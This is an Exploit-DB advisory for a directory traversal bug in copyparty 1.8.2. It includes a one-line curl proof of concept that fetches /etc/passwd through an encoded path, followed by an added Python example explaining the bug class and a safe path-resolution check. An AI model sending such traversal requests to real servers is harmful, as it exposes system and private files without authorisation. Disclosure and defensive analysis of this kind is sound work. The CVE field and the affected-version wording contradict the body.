- EDB-ID: 51636
- EDB Verified: Passed
- Author: VARTAMTEZIDIS THEODOROS
- Vulnerability type: WEBAPPS
- Platform: PYTHON
- CVE: cve-N/A
- Publication date: 2023-07-28
copyparty 1.8.2 - Directory Traversal
Code:
# Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474
#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.
#POC
curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'
- Source: www.exploit-db.com
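For defenders, the request shape in the PoC (a percent-encoded absolute path after a static-file prefix) maps to a well-known Python pitfall: `os.path.join()` discards the base directory when the later argument is absolute. The following is an added example, not copyparty's code and not part of the original post; `ROOT`, `naive_resolve` and `safe_resolve` are hypothetical names, and the page does not show the vulnerable code, so this illustrates the bug class and a containment check rather than the project's actual fix.

```python
import os
from urllib.parse import unquote

ROOT = "/srv/app/web"  # constructed static-file root (assumption)


def naive_resolve(root, url_tail):
    """Weak pattern: decode, then join, with no containment check.

    os.path.join() drops `root` entirely when the decoded tail is absolute.
    """
    return os.path.join(root, unquote(url_tail))


def safe_resolve(root, url_tail):
    """Return a real path inside `root`, or None if the request escapes it."""
    tail = unquote(url_tail)
    # Reject NUL bytes and anything that is absolute after decoding.
    if "\x00" in tail or tail.startswith(("/", "\\")) or os.path.isabs(tail):
        return None
    root_real = os.path.realpath(root)
    # realpath() collapses ".." and follows symlinks before the check.
    candidate = os.path.realpath(os.path.join(root_real, tail))
    if candidate != root_real and not candidate.startswith(root_real + os.sep):
        return None
    return candidate


def audit(tails, root=ROOT):
    """Return the subset of request tails that safe_resolve() refuses."""
    return [t for t in tails if safe_resolve(root, t) is None]


if __name__ == "__main__":
    # Constructed request tails (the part of the URL after the prefix).
    samples = ["css/site.css", "%2Fetc%2Fpasswd", "..%2F..%2Fetc%2Fpasswd"]
    for s in samples:
        print(f"{s!r:28} naive={naive_resolve(ROOT, s)!r} "
              f"safe={safe_resolve(ROOT, s)!r}")
```

The containment check runs on the decoded, canonicalised path, so encoded separators and `..` segments are judged by where they actually resolve.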